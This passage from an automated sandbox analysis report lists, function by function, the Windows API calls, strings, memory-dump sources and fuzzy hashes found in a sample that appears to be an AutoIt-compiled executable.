                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: f7e5e7cbf9c6cfc85366f9de14f8b09bd2c61b1f2b799dd70b5dff3034ac9767
                                          • Instruction ID: 4e6d7073d869a6c2198e4d19fe0371863b53b5431b74279af0d7e1eba36e9758
                                          • Opcode Fuzzy Hash: f7e5e7cbf9c6cfc85366f9de14f8b09bd2c61b1f2b799dd70b5dff3034ac9767
                                          • Instruction Fuzzy Hash: 3A5106A05487D53DFB3783748C95B7B7FAD6B86300F088989F1D4464C2D396AC98E750
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _wcsncpy$LocalTime
                                          • String ID:
                                          • API String ID: 2945705084-0
                                          • Opcode ID: 136ca7768163ee2644d8df2efaa754ab0799a24186a41cf556eacaf937b3d55b
                                          • Instruction ID: 8e98ab44c1f41479200a05788503ab0fad650fc2bb150bf9f174e8518e22d1c3
                                          • Opcode Fuzzy Hash: 136ca7768163ee2644d8df2efaa754ab0799a24186a41cf556eacaf937b3d55b
                                          • Instruction Fuzzy Hash: AC41B365C1062476CB11EBB4DC86ACFB3BC9F45310F508966F518E3225FB34A285C7EA
                                          APIs
                                            • Part of subcall function 0096466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00963697,?), ref: 0096468B
                                            • Part of subcall function 0096466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00963697,?), ref: 009646A4
                                          • lstrcmpiW.KERNEL32(?,?), ref: 009636B7
                                          • _wcscmp.LIBCMT ref: 009636D3
                                          • MoveFileW.KERNEL32(?,?), ref: 009636EB
                                          • _wcscat.LIBCMT ref: 00963733
                                          • SHFileOperationW.SHELL32(?), ref: 0096379F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                          • String ID: \*.*
                                          • API String ID: 1377345388-1173974218
                                          • Opcode ID: d489293ac6437bcea2c497a68bed465c19f18451710f1093c372f73f20f0b802
                                          • Instruction ID: 3c25fc205670609bc4a9d2112b9176814d7e429bd5d4382ea2af3db5d5f2e92e
                                          • Opcode Fuzzy Hash: d489293ac6437bcea2c497a68bed465c19f18451710f1093c372f73f20f0b802
                                          • Instruction Fuzzy Hash: C1416071508344AEC752EF64D442ADFB7ECEF89390F40492EB49AC3261EA34D689CB56
                                          APIs
                                          • _memset.LIBCMT ref: 009872AA
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00987351
                                          • IsMenu.USER32(?), ref: 00987369
                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009873B1
                                          • DrawMenuBar.USER32 ref: 009873C4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                          • String ID: 0
                                          • API String ID: 3866635326-4108050209
                                          • Opcode ID: 2a347d082267079969a8e63a932310535403bb5aab98497b9228b1c8b3070fa4
                                          • Instruction ID: 64e487501f8b1ca94783b7a5cbe8cffe2025df0b6d2b9d34c28478c19d27f6c1
                                          • Opcode Fuzzy Hash: 2a347d082267079969a8e63a932310535403bb5aab98497b9228b1c8b3070fa4
                                          • Instruction Fuzzy Hash: 0E411875A04208AFDB20EF90E884EAABBF8FB45350F24952AFD1597360D730ED50EB51
                                          APIs
                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00980FD4
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00980FFE
                                          • FreeLibrary.KERNEL32(00000000), ref: 009810B5
                                            • Part of subcall function 00980FA5: RegCloseKey.ADVAPI32(?), ref: 0098101B
                                            • Part of subcall function 00980FA5: FreeLibrary.KERNEL32(?), ref: 0098106D
                                            • Part of subcall function 00980FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00981090
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00981058
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                          • String ID:
                                          • API String ID: 395352322-0
                                          • Opcode ID: 02b5ccbfb4669e8276835110c778a81bec8d37e706f1b75c6ea2c41fd090fce7
                                          • Instruction ID: 8e7db6c910473861b5cace5c487b433db696c1a8ae76af51cb83268bd86c7185
                                          • Opcode Fuzzy Hash: 02b5ccbfb4669e8276835110c778a81bec8d37e706f1b75c6ea2c41fd090fce7
                                          • Instruction Fuzzy Hash: 0F310B71911109BFDB15AF90DC99EFFB7BCEF08300F10416AE501E2251EB749E8A9BA1
                                          APIs
                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 009862EC
                                          • GetWindowLongW.USER32(01026608,000000F0), ref: 0098631F
                                          • GetWindowLongW.USER32(01026608,000000F0), ref: 00986354
                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00986386
                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009863B0
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 009863C1
                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009863DB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: LongWindow$MessageSend
                                          • String ID:
                                          • API String ID: 2178440468-0
                                          • Opcode ID: 292901920c30e4fb83430807354ea9ea1ff826a3aa9e1428585787d3d4db8c47
                                          • Instruction ID: 84c4c0d1258549a4345ff0c15020f903c6af73489df0b780bca5223138f00df3
                                          • Opcode Fuzzy Hash: 292901920c30e4fb83430807354ea9ea1ff826a3aa9e1428585787d3d4db8c47
                                          • Instruction Fuzzy Hash: DF311030618255AFDB219F18EC84F593BE5BB4A714F1902A9F5019F3B2CB71A880EB50
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0095DB2E
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0095DB54
                                          • SysAllocString.OLEAUT32(00000000), ref: 0095DB57
                                          • SysAllocString.OLEAUT32(?), ref: 0095DB75
                                          • SysFreeString.OLEAUT32(?), ref: 0095DB7E
                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0095DBA3
                                          • SysAllocString.OLEAUT32(?), ref: 0095DBB1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                          • String ID:
                                          • API String ID: 3761583154-0
                                          • Opcode ID: f039d0285740c953a90a2c675e31a0fbba96252f823f95cd2838ae622d6a4d5a
                                          • Instruction ID: 972ea5606c14f994c17b95fbff5f7c469d93894a2f97785d67f35088e85165ef
                                          • Opcode Fuzzy Hash: f039d0285740c953a90a2c675e31a0fbba96252f823f95cd2838ae622d6a4d5a
                                          • Instruction Fuzzy Hash: BA21AE36605219AFEF20DFB9DC88CBB73ADEB08360B118536FD15DB2A0D6709C4597A0
                                          APIs
                                            • Part of subcall function 00977D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00977DB6
                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009761C6
                                          • WSAGetLastError.WSOCK32(00000000), ref: 009761D5
                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0097620E
                                          • connect.WSOCK32(00000000,?,00000010), ref: 00976217
                                          • WSAGetLastError.WSOCK32 ref: 00976221
                                          • closesocket.WSOCK32(00000000), ref: 0097624A
                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00976263
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                          • String ID:
                                          • API String ID: 910771015-0
                                          • Opcode ID: b90e65a65ec6ba3b1f2a7642aba8ef94473add9b28a5b0ce2dbe2107542d50cf
                                          • Instruction ID: d7404ca376db44476489053ff22b794b86e51b176fdf2dbb785678964a17f8f3
                                          • Opcode Fuzzy Hash: b90e65a65ec6ba3b1f2a7642aba8ef94473add9b28a5b0ce2dbe2107542d50cf
                                          • Instruction Fuzzy Hash: 3B31A472604504AFDF10AF64CC85BBD7BACEF85710F048069FD19E7292DB74AC049B61
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                          • API String ID: 1038674560-2734436370
                                          • Opcode ID: bc7e61199721def04dccc44c3c6266135b2458eb80959fe68a9355ded81aeeb3
                                          • Instruction ID: fe0ee9ea83c8c99e4bb4f73091bae6df34c2fab28ce820a7fc2467ed32a26f04
                                          • Opcode Fuzzy Hash: bc7e61199721def04dccc44c3c6266135b2458eb80959fe68a9355ded81aeeb3
                                          • Instruction Fuzzy Hash: B22179722052217ACA20E736AC22FA773DCDF99325F104839FD4587091EB549D89C395
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0095DC09
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0095DC2F
                                          • SysAllocString.OLEAUT32(00000000), ref: 0095DC32
                                          • SysAllocString.OLEAUT32 ref: 0095DC53
                                          • SysFreeString.OLEAUT32 ref: 0095DC5C
                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0095DC76
                                          • SysAllocString.OLEAUT32(?), ref: 0095DC84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                          • String ID:
                                          • API String ID: 3761583154-0
                                          • Opcode ID: 12a341d6c724fcaa050e48dd23f35fad3a03e99223ede754cc2e4ee852b466f0
                                          • Instruction ID: 47824bdec81887e1bea0997317a7c87a4839b09058e47725f74eb341984b17e8
                                          • Opcode Fuzzy Hash: 12a341d6c724fcaa050e48dd23f35fad3a03e99223ede754cc2e4ee852b466f0
                                          • Instruction Fuzzy Hash: CD21C535209204AFDB20DFB9DC88DAB77ECEB08361B108126FD45CB2A1DAB4DC45D764
                                          APIs
                                            • Part of subcall function 00901D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00901D73
                                            • Part of subcall function 00901D35: GetStockObject.GDI32(00000011), ref: 00901D87
                                            • Part of subcall function 00901D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00901D91
                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00987632
                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0098763F
                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0098764A
                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00987659
                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00987665
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$CreateObjectStockWindow
                                          • String ID: Msctls_Progress32
                                          • API String ID: 1025951953-3636473452
                                          • Opcode ID: d5e45623b5e1727560191bec3a44951c47ba54cfcc33d068e23245778c227c2d
                                          • Instruction ID: 97f0d648847d2cfe0bc3d3254a1513398692bdc8a93a80ed6d95c0a3e44e41f2
                                          • Opcode Fuzzy Hash: d5e45623b5e1727560191bec3a44951c47ba54cfcc33d068e23245778c227c2d
                                          • Instruction Fuzzy Hash: 6111B6B2110219BFEF159F64CC85EEBBF5DEF08798F114115B704A21A0D672DC21DBA4
                                          APIs
                                          • __init_pointers.LIBCMT ref: 00929AE6
                                            • Part of subcall function 00923187: EncodePointer.KERNEL32(00000000), ref: 0092318A
                                            • Part of subcall function 00923187: __initp_misc_winsig.LIBCMT ref: 009231A5
                                            • Part of subcall function 00923187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00929EA0
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00929EB4
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00929EC7
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00929EDA
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00929EED
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00929F00
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00929F13
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00929F26
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00929F39
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00929F4C
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00929F5F
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00929F72
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00929F85
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00929F98
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00929FAB
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00929FBE
                                          • __mtinitlocks.LIBCMT ref: 00929AEB
                                          • __mtterm.LIBCMT ref: 00929AF4
                                            • Part of subcall function 00929B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00929AF9,00927CD0,009BA0B8,00000014), ref: 00929C56
                                            • Part of subcall function 00929B5C: _free.LIBCMT ref: 00929C5D
                                            • Part of subcall function 00929B5C: DeleteCriticalSection.KERNEL32(009BEC00,?,?,00929AF9,00927CD0,009BA0B8,00000014), ref: 00929C7F
                                          • __calloc_crt.LIBCMT ref: 00929B19
                                          • __initptd.LIBCMT ref: 00929B3B
                                          • GetCurrentThreadId.KERNEL32 ref: 00929B42
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                          • String ID:
                                          • API String ID: 3567560977-0
                                          • Opcode ID: 776b6cba127be13e38d7342f9124fe9bc209833392656d8b26da83d439f3737e
                                          • Instruction ID: a42bbc0570966a7cea506e71f3baed04e7feba33e6048432c12ecc8d14bd59ff
                                          • Opcode Fuzzy Hash: 776b6cba127be13e38d7342f9124fe9bc209833392656d8b26da83d439f3737e
                                          • Instruction Fuzzy Hash: E4F0B43251D7315AE634B774BC0778A3698EF82734F204A19F464D91DEFF21844155A4
                                          APIs
                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00923F85), ref: 00924085
                                          • GetProcAddress.KERNEL32(00000000), ref: 0092408C
                                          • EncodePointer.KERNEL32(00000000), ref: 00924097
                                          • DecodePointer.KERNEL32(00923F85), ref: 009240B2
                                          Strings
                                          Similarity
                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                          • String ID: RoUninitialize$combase.dll
                                          • API String ID: 3489934621-2819208100
                                          • Opcode ID: 2fcc3c9e96bbb7bf882637f1efd52e13d6e40499642cbfad37f600bebee6b4da
                                          • Instruction ID: 845247a3887eb1bb4f69eb0da5cdd6aea4b220ba5efcbdffa368048582970f68
                                          • Opcode Fuzzy Hash: 2fcc3c9e96bbb7bf882637f1efd52e13d6e40499642cbfad37f600bebee6b4da
                                          • Instruction Fuzzy Hash: 43E0B6709AD300EFEB10AF62ED1DF453AA8B714786F14D029F111E52A0CBB64644FB14
                                          APIs
                                          Similarity
                                          • API ID: _memmove$__itow__swprintf
                                          • String ID:
                                          • API String ID: 3253778849-0
                                          • Opcode ID: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                          • Instruction ID: 7a8c6014ba826421cffe62bdee8937c1617f38dac76955b85b19417fc7438d03
                                          • Opcode Fuzzy Hash: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                          • Instruction Fuzzy Hash: 49617A7090065A9FCF01EF64DC82BFE77A9AF85308F058919FC5A6B293DB34A905DB50
                                          APIs
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                            • Part of subcall function 00980E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0097FDAD,?,?), ref: 00980E31
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009802BD
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009802FD
                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00980320
                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00980349
                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0098038C
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00980399
                                          Similarity
                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                          • String ID:
                                          • API String ID: 4046560759-0
                                          • Opcode ID: 15c5b4bc07d4cac6e3986a6af37a6ed5d04e7583cd27115bd36f903e67df5304
                                          • Instruction ID: 3abaccddd2c4f86ee9149ac667afb7f32db2231a51a4b0977130957394e1758a
                                          • Opcode Fuzzy Hash: 15c5b4bc07d4cac6e3986a6af37a6ed5d04e7583cd27115bd36f903e67df5304
                                          • Instruction Fuzzy Hash: 80514631208204AFCB14EF64C885E6EBBE9FFC5314F44491DF9958B2A2DB31E949DB52
                                          APIs
                                          • GetMenu.USER32(?), ref: 009857FB
                                          • GetMenuItemCount.USER32(00000000), ref: 00985832
                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0098585A
                                          • GetMenuItemID.USER32(?,?), ref: 009858C9
                                          • GetSubMenu.USER32(?,?), ref: 009858D7
                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 00985928
                                          Similarity
                                          • API ID: Menu$Item$CountMessagePostString
                                          • String ID:
                                          • API String ID: 650687236-0
                                          • Opcode ID: 6c7823e15639e3f86cce5f7f56283c8d746bf701e8ac7c6e47bb5f3ac917062a
                                          • Instruction ID: bd2e1e30de292bfb10cedd2de12fabc910a22b147f27d8b058abe4caf27a2761
                                          • Opcode Fuzzy Hash: 6c7823e15639e3f86cce5f7f56283c8d746bf701e8ac7c6e47bb5f3ac917062a
                                          • Instruction Fuzzy Hash: E2516D75E00615EFCF11EF64C855AAEB7B4EF88320F11846AE811BB351CB35AE45DB90
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 0095EF06
                                          • VariantClear.OLEAUT32(00000013), ref: 0095EF78
                                          • VariantClear.OLEAUT32(00000000), ref: 0095EFD3
                                          • _memmove.LIBCMT ref: 0095EFFD
                                          • VariantClear.OLEAUT32(?), ref: 0095F04A
                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0095F078
                                          Similarity
                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                          • String ID:
                                          • API String ID: 1101466143-0
                                          • Opcode ID: 6962431150ae92f1fa22f2d0aa46077819b19abb8f5e3a30d2c223d44b9c1632
                                          • Instruction ID: 980024fb64dccc8e6afc77b7d93e4b48135e538424340354acca218d9e805d0f
                                          • Opcode Fuzzy Hash: 6962431150ae92f1fa22f2d0aa46077819b19abb8f5e3a30d2c223d44b9c1632
                                          • Instruction Fuzzy Hash: ED517DB5A00209DFCB14CF68C894AAAB7B8FF4C310B15856AED49DB341E335E915CFA0
                                          APIs
                                          • _memset.LIBCMT ref: 00962258
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009622A3
                                          • IsMenu.USER32(00000000), ref: 009622C3
                                          • CreatePopupMenu.USER32 ref: 009622F7
                                          • GetMenuItemCount.USER32(000000FF), ref: 00962355
                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00962386
                                          Similarity
                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                          • String ID:
                                          • API String ID: 3311875123-0
                                          • Opcode ID: 3d81dd0eeae71e4b929319f220f27fdb93830dbf33285ce06991b453f161d534
                                          • Instruction ID: fe65c62172b42aa1b390909c847f6b03f98375f5665a59505c4884bec79c94e6
                                          • Opcode Fuzzy Hash: 3d81dd0eeae71e4b929319f220f27fdb93830dbf33285ce06991b453f161d534
                                          • Instruction Fuzzy Hash: 5B51CF70604B4ADBDF21CF68D888FADBBF9BF45714F104529E811A7390E3799944CB51
                                          APIs
                                            • Part of subcall function 00902612: GetWindowLongW.USER32(?,000000EB), ref: 00902623
                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 0090179A
                                          • GetWindowRect.USER32(?,?), ref: 009017FE
                                          • ScreenToClient.USER32(?,?), ref: 0090181B
                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0090182C
